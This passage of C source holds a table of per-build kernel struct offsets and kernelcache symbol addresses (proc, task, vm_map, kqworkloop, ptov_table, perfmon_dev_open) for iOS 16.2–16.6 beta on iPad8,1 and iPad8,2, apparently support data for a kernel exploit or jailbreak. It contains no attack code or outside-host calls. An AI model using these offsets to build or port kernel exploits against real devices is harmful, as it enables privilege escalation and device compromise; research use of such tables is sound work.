0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,1", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad8,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a381208, .kernelcache__gPhysBase = 0xfffffff00792ffa0, .kernelcache__gPhysSize = 0xfffffff00792ffa0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e178, .kernelcache__perfmon_devices = 0xfffffff00a3bf500, .kernelcache__perfmon_dev_open = 0xfffffff007ee9a88, .kernelcache__ptov_table = 0xfffffff0078e3160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3be990, .kernelcache__vm_pages = 0xfffffff0078dfea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3be988, .kernelcache__vn_kqfilter = 0xfffffff007f3863c, }, //16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad8,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a389288, .kernelcache__gPhysBase = 0xfffffff0079340e0, .kernelcache__gPhysSize = 0xfffffff0079340e0 + 0x8, .kernelcache__gVirtBase = 0xfffffff0079322b8, .kernelcache__perfmon_devices = 0xfffffff00a3c7500, .kernelcache__perfmon_dev_open = 0xfffffff007eedc8c, .kernelcache__ptov_table = 0xfffffff0078e7160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3c6990, .kernelcache__vm_pages = 0xfffffff0078e3ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e6110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3c6988, .kernelcache__vn_kqfilter = 0xfffffff007f3cad8, }, //16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad8,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a419ab0, .kernelcache__gPhysBase = 0xfffffff007944288, .kernelcache__gPhysSize = 0xfffffff007944288 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942440, .kernelcache__perfmon_devices = 0xfffffff00a459530, .kernelcache__perfmon_dev_open = 0xfffffff007f0a434, .kernelcache__ptov_table = 0xfffffff0078f79a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a458910, .kernelcache__vm_pages = 0xfffffff0078f40f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a458908, .kernelcache__vn_kqfilter = 0xfffffff007f58c44, }, // iPad8,2 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,2", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,2", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad8,2", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 0xfffffff007851f28, .kernelcache__perfmon_devices = 0xfffffff00a2f4380, .kernelcache__perfmon_dev_open = 0xfffffff007ec7398, .kernelcache__ptov_table = 0xfffffff007807288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2f3800, .kernelcache__vm_pages = 0xfffffff0078040c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007806248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2f37f8, .kernelcache__vn_kqfilter = 0xfffffff007f19a20, }, //16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad8,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 